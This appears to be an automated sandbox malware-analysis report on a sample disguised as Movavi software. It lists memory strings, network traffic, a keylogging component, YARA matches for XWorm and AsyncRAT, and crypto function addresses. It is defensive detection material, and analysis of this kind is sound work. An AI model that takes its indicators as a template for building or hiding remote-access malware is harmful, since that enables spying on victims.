Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com.
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/.
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/eula-general.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/eula.html)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/fr/privacy.html)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/fr/privacy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/fr/refund-policy.html)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/fr/refund-policy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/fr/support/).
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/it/privacy.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/it/privacy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/it/refund-policy.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/it/refund-policy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/it/support/).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/privacy.html)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/privacy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/refund-policy.html)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/refund-policy.html).
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/support).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/support/).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.com/tos.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.de/eula.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.de/privacy.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.de/privacy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.de/refund-policy.html)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.de/support/).
Source: motor1.exe	String found in binary or memory: https://www.movavi.de/tos.ht
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.movavi.de/tos.html)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.qt.io.
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.qt.io/
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.qt.io/.
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.youtube.com/t/terms.

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: unknown

HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.2466557767.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000015.00000002.2599478044.0000021451486000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process Stats: CPU usage > 49%

Contains functionality to communicate with device drivers

Source: C:\Users\user\SystemRootDoc\motor1.exe

Code function: 21_2_00007FFD9B1B8B30: CreateDirectoryW,CreateFileW,??0LogMessage@google@@QEAA@PEBDHH@Z,?stream@LogMessage@google@@QEAAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@XZ,GetLastError,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1LogMessage@google@@QEAA@XZ,RemoveDirectoryW,_invalid_parameter_noinfo_noreturn,DeviceIoControl,GetLastError,RemoveDirectoryW,??0LogMessage@google@@QEAA@PEBDHH@Z,?stream@LogMessage@google@@QEAAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@XZ,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1LogMessage@google@@QEAA@XZ,CloseHandle,

21_2_00007FFD9B1B8B30

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B77A20	4_2_00007FFD93B77A20
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B76432	4_2_00007FFD93B76432
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B7B030	4_2_00007FFD93B7B030
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B76440	4_2_00007FFD93B76440
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B7A800	4_2_00007FFD93B7A800
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B73A00	4_2_00007FFD93B73A00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B77BC0	4_2_00007FFD93B77BC0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B78D60	4_2_00007FFD93B78D60
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B7B360	4_2_00007FFD93B7B360
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B73B60	4_2_00007FFD93B73B60
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B77F80	4_2_00007FFD93B77F80
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B78120	4_2_00007FFD93B78120
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B77520	4_2_00007FFD93B77520
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B75140	4_2_00007FFD93B75140
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B71F00	4_2_00007FFD93B71F00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B73D00	4_2_00007FFD93B73D00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B7B2A2	4_2_00007FFD93B7B2A2
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B782B0	4_2_00007FFD93B782B0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B7A6C0	4_2_00007FFD93B7A6C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B714C0	4_2_00007FFD93B714C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B75860	4_2_00007FFD93B75860
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B77860	4_2_00007FFD93B77860
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B76C70	4_2_00007FFD93B76C70
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E66440	4_2_00007FFD93E66440
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E66432	4_2_00007FFD93E66432
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E6B030	4_2_00007FFD93E6B030
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E67A20	4_2_00007FFD93E67A20
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E6A800	4_2_00007FFD93E6A800
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E63A00	4_2_00007FFD93E63A00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E67BC0	4_2_00007FFD93E67BC0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E67F80	4_2_00007FFD93E67F80
